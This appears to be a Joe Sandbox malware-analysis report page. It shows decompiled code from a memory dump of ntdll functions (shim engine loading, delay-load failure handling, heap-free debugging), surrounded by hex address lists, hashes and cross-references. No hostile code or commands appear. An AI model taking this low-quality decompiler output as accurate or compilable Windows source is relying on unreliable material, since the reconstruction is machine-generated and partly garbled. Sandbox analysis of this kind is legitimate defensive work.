                                                    0x1d83f11c
                                                    0x1d83f11e
                                                    0x1d83f11e
                                                    0x1d83f12e
                                                    0x1d83f134
                                                    0x1d83f137
                                                    0x1d83f13b
                                                    0x1d83f13b
                                                    0x1d83f13c
                                                    0x1d83f13f
                                                    0x1d83f142
                                                    0x1d83f144
                                                    0x1d83f350
                                                    0x1d83f350
                                                    0x1d83f356
                                                    0x1d83f359
                                                    0x1d83f378
                                                    0x1d83f37d
                                                    0x1d83f35b
                                                    0x1d83f370
                                                    0x1d83f375
                                                    0x1d83f383
                                                    0x1d83f38e
                                                    0x00000000
                                                    0x1d83f14a
                                                    0x1d83f14a
                                                    0x1d83f14d
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83f153
                                                    0x1d83f156
                                                    0x1d83f15e
                                                    0x1d83f163
                                                    0x1d83f16a
                                                    0x1d83f16a
                                                    0x1d83f170
                                                    0x1d83f170
                                                    0x1d83f177
                                                    0x1d83f186
                                                    0x1d83f188
                                                    0x1d83f18b
                                                    0x1d83f18f
                                                    0x1d83f194
                                                    0x1d83f196
                                                    0x00000000
                                                    0x1d83f19c
                                                    0x1d83f19c
                                                    0x1d83f19f
                                                    0x1d83f1a3
                                                    0x1d83f1ac
                                                    0x1d83f1ac
                                                    0x1d83f1ac
                                                    0x1d83f1ae
                                                    0x1d83f1b0
                                                    0x1d83f1b3
                                                    0x1d83f1b6
                                                    0x1d83f1bb
                                                    0x1d83f1c5
                                                    0x1d83f1c8
                                                    0x1d83f1ca
                                                    0x1d83f1cb
                                                    0x1d83f1cf
                                                    0x1d83f1cf
                                                    0x1d83f1c8
                                                    0x1d83f1d4
                                                    0x1d83f1d8
                                                    0x1d83f208
                                                    0x1d83f20b
                                                    0x1d83f20e
                                                    0x1d83f1da
                                                    0x1d83f1dc
                                                    0x1d83f1e1
                                                    0x1d83f1e6
                                                    0x1d83f1ed
                                                    0x1d83f1ff
                                                    0x1d83f1ef
                                                    0x1d83f1f0
                                                    0x1d83f1f5
                                                    0x1d83f1f8
                                                    0x1d83f1fb
                                                    0x1d83f1fb
                                                    0x1d83f202
                                                    0x1d83f202
                                                    0x1d83f202
                                                    0x1d83f211
                                                    0x1d83f214
                                                    0x1d83f218
                                                    0x1d83f21b
                                                    0x1d83f227
                                                    0x1d83f22d
                                                    0x1d83f22d
                                                    0x1d83f22d
                                                    0x1d83f22f
                                                    0x1d83f236
                                                    0x1d83f238
                                                    0x1d83f23c
                                                    0x1d83f23c
                                                    0x1d83f244
                                                    0x1d83f24a
                                                    0x1d83f250
                                                    0x1d83f2be
                                                    0x1d83f2c1
                                                    0x1d83f2c4
                                                    0x1d83f2c9
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83f2cf
                                                    0x1d83f2d2
                                                    0x1d83f2d5
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83f2db
                                                    0x1d83f2e2
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83f2ec
                                                    0x1d83f2f3
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83f2f9
                                                    0x1d83f2ff
                                                    0x1d83f302
                                                    0x1d83f321
                                                    0x1d83f326
                                                    0x1d83f304
                                                    0x1d83f319
                                                    0x1d83f31e
                                                    0x1d83f337
                                                    0x1d83f338
                                                    0x1d83f343
                                                    0x00000000
                                                    0x1d83f252
                                                    0x1d83f252
                                                    0x1d83f255
                                                    0x1d83f274
                                                    0x1d83f279
                                                    0x1d83f257
                                                    0x1d83f26c
                                                    0x1d83f271
                                                    0x1d83f27f
                                                    0x1d83f28d
                                                    0x1d83f295
                                                    0x1d83f295
                                                    0x1d83f29b
                                                    0x1d83f29f
                                                    0x1d83f2a5
                                                    0x1d83f2ac
                                                    0x1d83f2b2
                                                    0x1d83f2b3
                                                    0x1d83f2b3
                                                    0x00000000
                                                    0x1d83f29f
                                                    0x1d83f250
                                                    0x1d83f196
                                                    0x1d83f0c9
                                                    0x1d83f0ce
                                                    0x1d83f0d6
                                                    0x1d83f0dc
                                                    0x1d83f3e7
                                                    0x1d83f3ea
                                                    0x1d83f3f6
                                                    0x1d83f3f6

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                    • API String ID: 3446177414-1745908468
                                                    • Opcode ID: 5c11311c791e7d7c46df4d061e6255ec2cde922b45cd3f8fa9f1216676ab82d9
                                                    • Instruction ID: f2cf2d5112cac24b74ac5809e8589b1bcbb9f0e14c216bb44eeb3c797485c54c
                                                    • Opcode Fuzzy Hash: 5c11311c791e7d7c46df4d061e6255ec2cde922b45cd3f8fa9f1216676ab82d9
                                                    • Instruction Fuzzy Hash: A8912836904649EFCB06CFA8D4407EDBBF2FF49721F158099E48997262C775E940CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D78640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E1D78640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1d88b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1D786C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x1d8837c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1D78BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1D7D4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1D80E692();
					_t85 =  *0x1d8837c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1D7AE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1D786B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E1D7BE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1d8837c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E1D80E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1d8837c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1d885d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1D7C7DF6( *((intOrPtr*)(_t108 + 0xc)));
					E1D7AD3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1D786868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1d8837c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x1d889208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1d885b24; // 0x18e2d98
					asm("ror esi, cl");
					 *0x1d8891e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1D786565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                    0x1d786415
                                                    0x1d786422
                                                    0x1d78642e
                                                    0x1d78642f
                                                    0x1d786434
                                                    0x1d78643a
                                                    0x1d78643b
                                                    0x1d786440
                                                    0x1d786446
                                                    0x1d78644e
                                                    0x1d786458
                                                    0x1d786460
                                                    0x1d786465
                                                    0x1d78646c
                                                    0x1d7e9770
                                                    0x1d7e9776
                                                    0x1d7e9779
                                                    0x1d7e97b3
                                                    0x1d7e97b3
                                                    0x1d7e97dd
                                                    0x1d7e97dd
                                                    0x1d7e97e3
                                                    0x1d7e97e3
                                                    0x1d786542
                                                    0x1d786542
                                                    0x1d78654a
                                                    0x1d7e982b
                                                    0x1d7e982b
                                                    0x1d786557
                                                    0x1d786558
                                                    0x1d786559
                                                    0x1d786564
                                                    0x1d786564
                                                    0x1d7e977b
                                                    0x1d7e977c
                                                    0x1d7e9781
                                                    0x1d7e9783
                                                    0x1d7e9788
                                                    0x1d7e97a0
                                                    0x1d7e97a0
                                                    0x1d7e97a5
                                                    0x1d7e97aa
                                                    0x1d7e97b0
                                                    0x00000000
                                                    0x1d7e97b0
                                                    0x1d78647e
                                                    0x1d78648b
                                                    0x1d786498
                                                    0x1d78649e
                                                    0x1d7e97ed
                                                    0x1d7e97ed
                                                    0x1d7864a4
                                                    0x1d7864a6
                                                    0x1d7e97f7
                                                    0x1d7e97fc
                                                    0x1d7e97fe
                                                    0x1d7e97ce
                                                    0x1d7e97d3
                                                    0x1d7e97d8
                                                    0x1d7e97d8
                                                    0x1d7e97db
                                                    0x00000000
                                                    0x1d7864ac
                                                    0x1d7864b0
                                                    0x1d7864be
                                                    0x1d7864c3
                                                    0x1d7864cc
                                                    0x1d7864d1
                                                    0x1d7864d8
                                                    0x1d7e9802
                                                    0x1d7e9808
                                                    0x1d7e980b
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7e978f
                                                    0x1d7e9790
                                                    0x1d7e9795
                                                    0x1d7e9796
                                                    0x1d7e979b
                                                    0x00000000
                                                    0x1d7e979b
                                                    0x1d7864de
                                                    0x1d7864eb
                                                    0x1d7864f1
                                                    0x1d7864f9
                                                    0x1d786507
                                                    0x1d786510
                                                    0x1d78651c
                                                    0x1d786526
                                                    0x1d78652c
                                                    0x1d78653c
                                                    0x1d7e981d
                                                    0x1d7e981d
                                                    0x1d78653c
                                                    0x00000000
                                                    0x1d786526

                                                    APIs
                                                    • RtlDebugPrintTimes.NTDLL ref: 1D78651C
                                                      • Part of subcall function 1D786565: RtlDebugPrintTimes.NTDLL ref: 1D786614
                                                      • Part of subcall function 1D786565: RtlDebugPrintTimes.NTDLL ref: 1D78665F
                                                    Strings
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D7E977C
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 1D7E97A0, 1D7E97C9
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D7E97B9
                                                    • LdrpInitShimEngine, xrefs: 1D7E9783, 1D7E9796, 1D7E97BF
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D7E9790
                                                    • apphelp.dll, xrefs: 1D786446
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 3446177414-204845295
                                                    • Opcode ID: 745939734fdfd3322358760fcabe7484bd7b1a4de31cb6a7d0d4d4067468513e
                                                    • Instruction ID: ec7e86812dc2b1ebae912d07eea83d105e37f8eadc3630f164268da143fc9c0a
                                                    • Opcode Fuzzy Hash: 745939734fdfd3322358760fcabe7484bd7b1a4de31cb6a7d0d4d4067468513e
                                                    • Instruction Fuzzy Hash: F651A175608310AFD311DF24D895BAB77E8FF846A4F01491AF59597161EB30E904CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D80FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 17%
                                                    			E1D80FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E1D80F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x1d8837c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E1D80E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x1d8837c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x1d88391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x1d8891e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E1D7C6010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x1d8891e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                    0x1d80fa10
                                                    0x1d80fa12
                                                    0x1d80fa18
                                                    0x1d80fa1d
                                                    0x1d80fa2b
                                                    0x1d80fa30
                                                    0x1d80fa35
                                                    0x1d80fa3a
                                                    0x1d80fa3c
                                                    0x1d80fa40
                                                    0x1d80fa42
                                                    0x1d80fa42
                                                    0x1d80fa47
                                                    0x1d80fa50
                                                    0x1d80fa51
                                                    0x1d80fa54
                                                    0x1d80fa6d
                                                    0x1d80fa72
                                                    0x1d80fa77
                                                    0x1d80fa7c
                                                    0x1d80fa7e
                                                    0x1d80fa7e
                                                    0x1d80fa81
                                                    0x1d80fa99
                                                    0x00000000
                                                    0x1d80fa83
                                                    0x1d80fa8a
                                                    0x1d80fa8d
                                                    0x1d80fa9b
                                                    0x1d80fa9b
                                                    0x00000000
                                                    0x1d80fa95
                                                    0x1d80fa95
                                                    0x1d80fa9d
                                                    0x1d80fa9d
                                                    0x1d80faa2
                                                    0x1d80fb01
                                                    0x1d80fb01
                                                    0x1d80fb06
                                                    0x1d80fb0a
                                                    0x1d80fb0c
                                                    0x1d80fb0c
                                                    0x1d80fb15
                                                    0x1d80fb1d
                                                    0x1d80fb1d
                                                    0x00000000
                                                    0x1d80faa8
                                                    0x1d80faae
                                                    0x1d80fab4
                                                    0x1d80faba
                                                    0x1d80fabd
                                                    0x1d80fac4
                                                    0x1d80fac7
                                                    0x1d80facf
                                                    0x1d80fad4
                                                    0x1d80fae5
                                                    0x1d80fae8
                                                    0x1d80fad6
                                                    0x1d80fad6
                                                    0x1d80fadd
                                                    0x1d80fadd
                                                    0x1d80faf3
                                                    0x1d80fafb
                                                    0x1d80faff
                                                    0x1d80fb21
                                                    0x1d80fb25
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d80faff
                                                    0x1d80faa2
                                                    0x1d80fa8d

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                    • API String ID: 3446177414-4227709934
                                                    • Opcode ID: b8091e00f5332be564005b3fe2733e36fea63e4c9fcead16d19b5f9be5cd0a04
                                                    • Instruction ID: b63aed393632c223d2c62208ee5931c1ae78a441e66dcc55d33d70ad2e7f6c3e
                                                    • Opcode Fuzzy Hash: b8091e00f5332be564005b3fe2733e36fea63e4c9fcead16d19b5f9be5cd0a04
                                                    • Instruction Fuzzy Hash: BF416DB6A01219AFCB01DF98CC94AEEBBB5FF88754F118129F904A7350D731AA01CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D83F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E1D83F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x1d86d2f8);
				E1D7E7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E1D787662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E1D83FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E1D79FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E1D840835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E1D78753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8847d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E1D7A3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E1D840D24( *((intOrPtr*)(_t165 - 0x30)));
								E1D840835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x1d8847d4;
							if( *0x1d8847d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E1D84D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E1D7C3AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x1d8847d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8847d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E1D78B910();
								} else {
									E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D83823A(_t162,  *(_t165 - 0x20)));
								E1D78B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x1d8847a1 = 1;
									 *0x1d884100 = 0;
									asm("int3");
									 *0x1d8847a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E1D78B910("About to free block at %p\n",  *0x1d8847d0);
						goto L30;
					}
				} else {
					_t164 =  *0x1d883750; // 0x0
					 *0x1d8891e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                    0x1d83f8f8
                                                    0x1d83f8fa
                                                    0x1d83f8ff
                                                    0x1d83f906
                                                    0x1d83f909
                                                    0x1d83f90b
                                                    0x1d83f910
                                                    0x1d83f912
                                                    0x1d83f915
                                                    0x1d83f91f
                                                    0x1d83f93e
                                                    0x1d83f941
                                                    0x1d83f94f
                                                    0x1d83f954
                                                    0x1d83f956
                                                    0x1d83fb8c
                                                    0x1d83fb8e
                                                    0x1d83fb91
                                                    0x1d83fb91
                                                    0x1d83fb94
                                                    0x1d83fb9b
                                                    0x1d83fba0
                                                    0x00000000
                                                    0x1d83fba0
                                                    0x1d83f95f
                                                    0x1d83f962
                                                    0x1d83f96c
                                                    0x1d83f96f
                                                    0x1d83f972
                                                    0x1d83f97a
                                                    0x1d83f97f
                                                    0x1d83f986
                                                    0x1d83f986
                                                    0x1d83f98b
                                                    0x1d83f98b
                                                    0x1d83f992
                                                    0x1d83f99a
                                                    0x1d83f99d
                                                    0x1d83f9a1
                                                    0x1d83f9aa
                                                    0x1d83f9aa
                                                    0x1d83f9aa
                                                    0x1d83f9ac
                                                    0x1d83f9af
                                                    0x1d83f9b7
                                                    0x1d83f9b9
                                                    0x1d83f9be
                                                    0x1d83f9c0
                                                    0x00000000
                                                    0x1d83f9c6
                                                    0x1d83f9c9
                                                    0x1d83f9cf
                                                    0x1d83f9d5
                                                    0x1d83fa1b
                                                    0x1d83fa1e
                                                    0x1d83fa21
                                                    0x1d83fa26
                                                    0x1d83fb2b
                                                    0x1d83fb37
                                                    0x1d83fb39
                                                    0x1d83fb41
                                                    0x1d83fb4b
                                                    0x00000000
                                                    0x1d83fb4b
                                                    0x1d83fa2c
                                                    0x1d83fa33
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83fa39
                                                    0x1d83fa3c
                                                    0x1d83fa3f
                                                    0x1d83fa42
                                                    0x1d83fa47
                                                    0x1d83fa49
                                                    0x1d83fa4c
                                                    0x1d83fa51
                                                    0x1d83fa54
                                                    0x1d83fa56
                                                    0x1d83fa5b
                                                    0x1d83fa60
                                                    0x1d83fa60
                                                    0x1d83fa54
                                                    0x1d83fa63
                                                    0x1d83fa67
                                                    0x1d83fa79
                                                    0x1d83fa7c
                                                    0x1d83fa7f
                                                    0x1d83fa69
                                                    0x1d83fa6b
                                                    0x1d83fa70
                                                    0x1d83fa73
                                                    0x1d83fa73
                                                    0x1d83fa82
                                                    0x1d83fa84
                                                    0x1d83fa88
                                                    0x1d83fa8b
                                                    0x1d83fa8d
                                                    0x1d83fa90
                                                    0x1d83fa95
                                                    0x1d83fa9b
                                                    0x1d83fa9b
                                                    0x1d83fa9b
                                                    0x1d83fa9d
                                                    0x1d83faa0
                                                    0x1d83faa6
                                                    0x1d83faad
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83fab3
                                                    0x1d83faba
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83fabc
                                                    0x1d83fac2
                                                    0x1d83fac5
                                                    0x1d83fae4
                                                    0x1d83fae9
                                                    0x1d83fac7
                                                    0x1d83fadc
                                                    0x1d83fae1
                                                    0x1d83fafa
                                                    0x1d83fb03
                                                    0x1d83fb0b
                                                    0x1d83fb0b
                                                    0x1d83fb11
                                                    0x1d83fb15
                                                    0x1d83fb17
                                                    0x1d83fb1e
                                                    0x1d83fb24
                                                    0x1d83fb25
                                                    0x1d83fb25
